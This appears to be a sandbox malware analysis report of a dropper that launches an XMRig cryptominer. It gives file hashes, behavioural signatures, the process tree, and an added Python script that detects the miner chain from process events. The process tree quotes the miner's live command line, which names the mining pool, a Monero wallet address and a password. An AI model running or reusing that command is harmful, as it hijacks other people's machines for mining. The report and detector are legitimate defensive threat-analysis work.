Analysis

max time kernel: 15s
max time network: 118s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 27/10/2024, 12:30

Static task: static1
Behavioral task: behavioral1
Sample: 1214286113800f855601b0317bf0bb73044f48606d412f99ca0bf2b4601bff97N.exe
Resource: win7-20240903-en
General

Target: 1214286113800f855601b0317bf0bb73044f48606d412f99ca0bf2b4601bff97N.exe
Size: 2.4MB
MD5: f7a709560c8c538bf840d38adad98060
SHA1: 4396b0b5699837c1fddedb91c832b09a6a9ca2b9
SHA256: 1214286113800f855601b0317bf0bb73044f48606d412f99ca0bf2b4601bff97
SHA512: 5cec8dc34a2df3d62aa056b1826708d6e1e81d6d87bac2074fdc243e614e191799366e9411f0c7e48e74799131a0eb02916e7b10a5f63a81e0997482c3d1ca99
SSDEEP: 49152:nILryvOacuT9fbDxw6++uxp+NqiurJoP6rZ0B1qxtVujoiJ67XoifXUGOOnx:n3zfaJ+uxp+8rZ9t8JQfEQx
Malware Config
Signatures

XMRig Miner payload (2 IoCs)
  resource                                      yara_rule
  behavioral1/files/0x0008000000017403-20.dat   family_xmrig
  behavioral1/files/0x0008000000017403-20.dat   xmrig

Xmrig family

Executes dropped EXE (1 IoC)
  pid    Process
  1480   xmrig.exe

Loads dropped DLL (1 IoC)
  pid    Process
  2704   cmd.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTP, 2 IoCs)
  Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.
  description   ioc                                                           Process
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   1214286113800f855601b0317bf0bb73044f48606d412f99ca0bf2b4601bff97N.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   cmd.exe
Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description                    pid    Process
  Token: SeLockMemoryPrivilege   1480   xmrig.exe
  Token: SeLockMemoryPrivilege   1480   xmrig.exe

Suspicious use of FindShellTrayWindow (1 IoC)
  pid    Process
  1480   xmrig.exe

Suspicious use of WriteProcessMemory (8 IoCs)
  description                        pid    Process                                                                    procid_target
  PID 2108 wrote to memory of 2704   2108   1214286113800f855601b0317bf0bb73044f48606d412f99ca0bf2b4601bff97N.exe   30   (recorded 4 times)
  PID 2704 wrote to memory of 1480   2704   cmd.exe                                                                    32   (recorded 4 times)
Processes

1. C:\Users\Admin\AppData\Local\Temp\1214286113800f855601b0317bf0bb73044f48606d412f99ca0bf2b4601bff97N.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\1214286113800f855601b0317bf0bb73044f48606d412f99ca0bf2b4601bff97N.exe"
   PID: 2108
   - System Location Discovery: System Language Discovery
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\SysWOW64\cmd.exe
      Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\1.cmd" "
      PID: 2704
      - Loads dropped DLL
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      3. C:\Users\Admin\AppData\Local\Temp\xmrig.exe
         Command line: xmrig --url pool.hashvault.pro:80 --user 44nkuDevyMkUnE7Lc4kJThfZqW3zyQ62nZxB9Ca6ikxTK7SMYdLmb9eSdp3PcYDwziHMN1xyq3Yq7BNcbGXDCBhWMzEVEBX --pass UOO
         PID: 1480
         - Executes dropped EXE
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious use of FindShellTrayWindow
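The process tree above is the whole story of this sample: a dropper in %TEMP% writes 1.cmd, runs it through cmd.exe, and the batch file launches a dropped xmrig.exe with the pool, wallet and password on the command line. The WriteProcessMemory and AdjustPrivilegeToken IoCs in the Signatures section are the same chain seen from the other side (the SeLockMemoryPrivilege request is XMRig setting up large pages for its scratchpad). The script below is an added example, not tooling from the sandbox or from the sample: it scores a process list for exactly those indicators, so the same logic can be pointed at EDR or Sysmon process-creation data. The event schema (pid, ppid, image, cmdline, and pid/privilege for token events) is an assumption, and the events are constructed to mirror this report rather than taken from a real log. The NLS\Language key read by cmd.exe is deliberately not scored; it is a low-signal sandbox heuristic.

```python
"""Score the dropper -> cmd.exe -> xmrig.exe chain from a sandbox process tree.

Added example; not tooling from the sandbox vendor or the sample. The event
schema (pid, ppid, image, cmdline / pid, privilege) is an assumption, and the
events below are constructed to mirror the report, not a captured log.
"""
import re

# Monero standard address: '4' followed by 94 base58 characters (95 total).
# Subaddresses start with '8' and integrated addresses are 106 chars; extend
# the pattern if a pool user field looks different.
MONERO_ADDR = re.compile(r"^4[1-9A-HJ-NP-Za-km-z]{94}$")
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
# xmrig CLI flags (long and short forms) that carry the pool and wallet.
MINER_FLAGS = {"--url": "url", "-o": "url", "--user": "user", "-u": "user",
               "--pass": "pass", "-p": "pass"}

DROPPER = r"C:\Users\Admin\AppData\Local\Temp\1214286113800f855601b0317bf0bb73044f48606d412f99ca0bf2b4601bff97N.exe"
WALLET = "44nkuDevyMkUnE7Lc4kJThfZqW3zyQ62nZxB9Ca6ikxTK7SMYdLmb9eSdp3PcYDwziHMN1xyq3Yq7BNcbGXDCBhWMzEVEBX"

# Constructed process-creation events mirroring the report's Processes section.
# The dropper's own parent is not in the report, so its ppid is None.
PROCESS_EVENTS = [
    {"pid": 2108, "ppid": None, "image": DROPPER, "cmdline": f'"{DROPPER}"'},
    {"pid": 2704, "ppid": 2108, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'cmd /c ""C:\Users\Admin\AppData\Local\Temp\1.cmd" "'},
    {"pid": 1480, "ppid": 2704, "image": r"C:\Users\Admin\AppData\Local\Temp\xmrig.exe",
     "cmdline": f"xmrig --url pool.hashvault.pro:80 --user {WALLET} --pass UOO"},
]
# Constructed token-adjust events mirroring the two AdjustPrivilegeToken IoCs.
TOKEN_EVENTS = [
    {"pid": 1480, "privilege": "SeLockMemoryPrivilege"},
    {"pid": 1480, "privilege": "SeLockMemoryPrivilege"},
]


def parse_miner_args(cmdline):
    """Return url/user/pass from an xmrig-style command line.

    Accepts '--url host:port' and '--url=host:port'. Splits on whitespace,
    which is enough for miner arguments (they carry no spaces).
    """
    found, tokens, i = {}, cmdline.split(), 0
    while i < len(tokens):
        key, eq, val = tokens[i].partition("=")
        if key in MINER_FLAGS:
            if not eq and i + 1 < len(tokens):
                i += 1
                val = tokens[i]
            found[MINER_FLAGS[key]] = val
        i += 1
    return found


def is_monero_address(value):
    return bool(MONERO_ADDR.match(value))


def pool_host_port(url):
    """Split 'stratum+tcp://host:port' or 'host:port' into (host, port)."""
    bare = url.rsplit("://", 1)[-1]
    host, sep, port = bare.rpartition(":")
    if not sep:
        return bare, None
    return host, int(port) if port.isdigit() else None


def ancestry(events, pid):
    """Return [process, parent, grandparent, ...], stopping at an unknown ppid."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain


def analyze(events, token_events):
    """Flag processes with pool+wallet arguments and enrich each hit with the
    contextual indicators the report shows (parent chain, %TEMP%, privilege)."""
    lock_mem = {t["pid"] for t in token_events if t["privilege"] == "SeLockMemoryPrivilege"}
    findings = []
    for e in events:
        args = parse_miner_args(e["cmdline"])
        if "url" not in args or "user" not in args:
            continue
        host, port = pool_host_port(args["url"])
        reasons = [f"pool argument {host}:{port}"]
        if is_monero_address(args["user"]):
            reasons.append("Monero wallet address passed as --user")
        if port in (80, 443):
            reasons.append("stratum over a web port (blends with HTTP/HTTPS egress)")
        chain = ancestry(events, e["pid"])
        if (len(chain) >= 3 and chain[1]["image"].lower().endswith("cmd.exe")
                and TEMP_DIR.search(chain[2]["image"])):
            reasons.append("spawned by cmd.exe whose parent runs from %TEMP%")
        if TEMP_DIR.search(e["image"]):
            reasons.append("miner binary executed from %TEMP%")
        if e["pid"] in lock_mem:
            reasons.append("SeLockMemoryPrivilege enabled (XMRig large-page setup)")
        findings.append({"pid": e["pid"], "image": e["image"], "pool": f"{host}:{port}",
                         "wallet": args["user"], "reasons": reasons, "score": len(reasons)})
    return findings


if __name__ == "__main__":
    for f in analyze(PROCESS_EVENTS, TOKEN_EVENTS):
        print(f"PID {f['pid']} score={f['score']} pool={f['pool']} wallet={f['wallet'][:12]}...")
        for r in f["reasons"]:
            print("  -", r)
```

Only xmrig.exe (PID 1480) is flagged; the dropper and cmd.exe carry no pool or wallet arguments, so they are reported through the ancestry of the miner rather than as hits of their own. The wallet string is the pivot worth keeping: it is stable across repacked droppers even when the binary hash and the 1.cmd contents change.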
Network
MITRE ATT&CK Enterprise v15
Downloads

File 1
  Filesize: 182B
  MD5: 5ee6977e66bcd50d25effdec2d2a23d0
  SHA1: d6817af66d573ee64e29dec0bc7e47e732b0da3c
  SHA256: a42894d4886ca4eb3fe3ea985ece123987008b7644ca18fa9837d28e8fbb5488
  SHA512: 30a508e5282aa263f3dafc36a0fcc6675b3105da4e70cfa4176416c893e441695336335d128d680bdee4cbf2b2defe9fdc3adba7116ad0a5631e3433390936f3

File 2
  Filesize: 6.1MB
  MD5: 5fba8ae226b096da3b31de0e17496735
  SHA1: d532a01254cf9e0229d3c5803b78ff7c9b0cb8d3
  SHA256: ca28f4aeaa5e16d216cd828b67454a56f3c7feeb242412d26ed914fadff20d40
  SHA512: 951e44fc0864a6741bcbb4227feb5429a032713dabd91102f4f0e27a69181ce7f23562e902cc09896ae26334b6d18caf0f5a13d81370bd703fd7ed6f78b47e72